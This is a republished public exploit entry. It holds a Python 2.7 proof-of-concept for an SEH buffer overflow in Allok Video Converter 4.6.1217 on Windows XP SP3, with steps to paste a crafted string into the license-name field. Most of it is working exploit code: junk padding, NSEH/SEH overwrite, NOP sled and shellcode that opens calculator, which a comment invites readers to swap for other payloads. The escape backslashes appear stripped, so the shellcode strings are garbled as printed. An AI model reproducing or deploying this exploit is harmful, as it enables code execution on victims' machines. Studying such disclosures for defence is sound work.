Allok Quicktime To AVI MPEG DVD Converter 4.6.1217 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 429

# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability # SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Video Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_vconverter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "x90x90xebx10"
seh = struct.pack("<L",0x10019A09)
nops = "x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="xbaxd5x31x08x38xdbxcbxd9x74x24xf4x5bx29xc9xb1"
shellcode +="x33x83xc3x04x31x53x0ex03x86x3fxeaxcdxd4xa8x63"
shellcode +="x2dx24x29x14xa7xc1x18x06xd3x82x09x96x97xc6xa1"
shellcode +="x5dxf5xf2x32x13xd2xf5xf3x9ex04x38x03x2fx89x96"
shellcode +="xc7x31x75xe4x1bx92x44x27x6exd3x81x55x81x81x5a"
shellcode +="x12x30x36xeex66x89x37x20xedxb1x4fx45x31x45xfa"
shellcode +="x44x61xf6x71x0ex99x7cxddxafx98x51x3dx93xd3xde"
shellcode +="xf6x67xe2x36xc7x88xd5x76x84xb6xdax7axd4xffxdc"
shellcode +="x64xa3x0bx1fx18xb4xcfx62xc6x31xd2xc4x8dxe2x36"
shellcode +="xf5x42x74xbcxf9x2fxf2x9ax1dxb1xd7x90x19x3axd6"
shellcode +="x76xa8x78xfdx52xf1xdbx9cxc3x5fx8dxa1x14x07x72"
shellcode +="x04x5exa5x67x3ex3dxa3x76xb2x3bx8ax79xccx43xbc"
shellcode +="x11xfdxc8x53x65x02x1bx10x99x48x06x30x32x15xd2"
shellcode +="x01x5fxa6x08x45x66x25xb9x35x9dx35xc8x30xd9xf1"
shellcode +="x20x48x72x94x46xffx73xbdx24x9exe7x5dx85x05x80"
shellcode +="xc4xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()